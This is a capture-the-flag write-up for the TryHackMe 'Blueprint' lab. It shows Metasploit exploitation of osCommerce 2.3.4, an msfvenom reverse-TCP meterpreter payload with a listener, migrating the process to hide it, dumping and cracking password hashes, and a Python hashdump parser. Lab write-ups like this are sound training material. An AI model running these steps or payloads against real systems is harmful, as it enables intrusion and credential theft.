Try Hack Me – Blueprint CTF Writeup

Introduction

This CTF from Try Hack Me is a Windows-based box where you have to gain an initial foothold and then escalate your privileges.

If you want to try this room, you can find it here.

In this writeup I have shown the box being done using Metasploit; it can be done many other ways, but I wanted to demonstrate this method.

Brief

The brief just outlines that we are looking for the Lab user's NTLM hash (cracked to the plaintext password) and the root flag.

Recon and Vulnerability

As always, I started out with my Nmap scan.

nmap -sV -Pn -sC -oN <output_file> <IP>

The result I'm most interested in is the HTTP site on port 8080; browsing to it brings up an osCommerce storefront.

Just visiting this site gave me the version number of osCommerce. I know there are known vulnerabilities in osCommerce, so this will be my area of research!

Exploiting the Vulnerability!

Looking through Exploit-DB I could see there were vulnerabilities listed for osCommerce, so I decided to search Metasploit.

This had exactly what I was looking for!

If you have searched as I have, just type use 0

Then type show options

From this screen you need to do the following:

set RHOSTS <Target_IP>
set RPORT <Target_Port> #in our case 8080
set LHOST <Your_IP>
set URI <Path_to_Install> #see my note below

For the URI, this is the path to the install directory, which is usually the parent folder followed by /catalog/install/.

Our parent folder is oscommerce-2.3.4 so our URI is oscommerce-2.3.4/catalog/install/.

Once you have set these, type run in Metasploit!

THIS ISN’T STABLE!

When this exploit runs, the meterpreter session is prone to disconnecting; I need to sort this!

In a new console tab, I used the command below to generate an msfvenom payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=<your port> -f exe > safeshell1.exe

When you set the port, do not use 4444, as this is already being used by the other meterpreter session.

Once the payload is generated, I need to get it onto the machine and execute it, using the commands below in my original meterpreter session.

upload safeshell1.exe
execute -f safeshell1.exe

If this doesn't work, make sure the msfvenom payload is in the same directory you started msfconsole from, and you may need to re-run your original exploit.

With this running, we need another console tab and to start msfconsole again.

In this new msfconsole, type use exploit/multi/handler and then type show options.

You need to set the following options:

set LHOST <Your_IP>
set LPORT <Port_from_msfvenom>
set PAYLOAD windows/meterpreter/reverse_tcp

Then type run

If this didn’t connect straight away, try typing execute -f safeshell1.exe in your original meterpreter session.

BONUS

I wanted to add a little bonus bit in here about migrating; while not required in this CTF, it is good to understand.

At this point, you should consider migrating your meterpreter process into a different process to hide it.

In Metasploit you can do this easily by typing:

run post/windows/manage/migrate

Let's CTF!

Now that we have our stable (and migrated) meterpreter session, let's get the flags!

We know we need to crack the Lab user's hash, so in meterpreter type hashdump.

The Lab user's hash is the last one on the list. The bit we need to copy is the NT hash, which is the fourth colon-separated field on that line, sitting just before the trailing :::.
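To make that format concrete, here is an added example (my own code, not part of the original writeup or of Metasploit) that parses hashdump output into its fields, picks out the Lab user's NT hash, and flags the two things a defender looks for in such a dump: LM hashes still being stored and blank passwords. The sample lines and hash values in it are constructed placeholders, not values from the box.

```python
import re

# Well-known, publicly documented hashes of an empty value (not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of a blank password

# pwdump format:  user:RID:LM_hash:NT_hash:::  (the NT hash is the 4th field)
_ENTRY = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

def parse_hashdump(text):
    """Return one dict per account; banner lines and prompts are skipped."""
    accounts = []
    for line in text.splitlines():
        m = _ENTRY.match(line.strip())
        if not m:
            continue
        acct = m.groupdict()
        acct["rid"] = int(acct["rid"])
        acct["lm"] = acct["lm"].lower()
        acct["nt"] = acct["nt"].lower()
        # Defender-relevant flags: a stored LM hash means weak legacy hashing
        # is still enabled; the empty NT hash means the password is blank.
        acct["lm_stored"] = acct["lm"] != EMPTY_LM
        acct["blank_password"] = acct["nt"] == EMPTY_NT
        accounts.append(acct)
    return accounts

def nt_hash_for(text, username):
    """NT hash for one account (username compared case-insensitively), or None."""
    for acct in parse_hashdump(text):
        if acct["user"].lower() == username.lower():
            return acct["nt"]
    return None

# Constructed sample resembling hashdump output; the hashes are placeholders,
# not values from the Blueprint box.
SAMPLE = """\
[*] Obtaining the boot key...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for a in parse_hashdump(SAMPLE):
        print(a["user"], a["rid"], a["nt"], "(blank password)" if a["blank_password"] else "")
```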

I used CrackStation to crack this hash for me!

We have our first flag!

Now for root: in our meterpreter session, type shell to get a Windows command shell.

I found the flag on the Administrator's desktop, so to get there type:

cd c:\
cd Users
cd Administrator
cd Desktop
dir
more root.txt.txt

We did it!

This gives us the root flag for the blueprint box!

Conclusion

This is a really good room to practise Metasploit skills; I really do recommend that you give the process migration a go!

If you have any questions or want to suggest a room for me to do next let me know!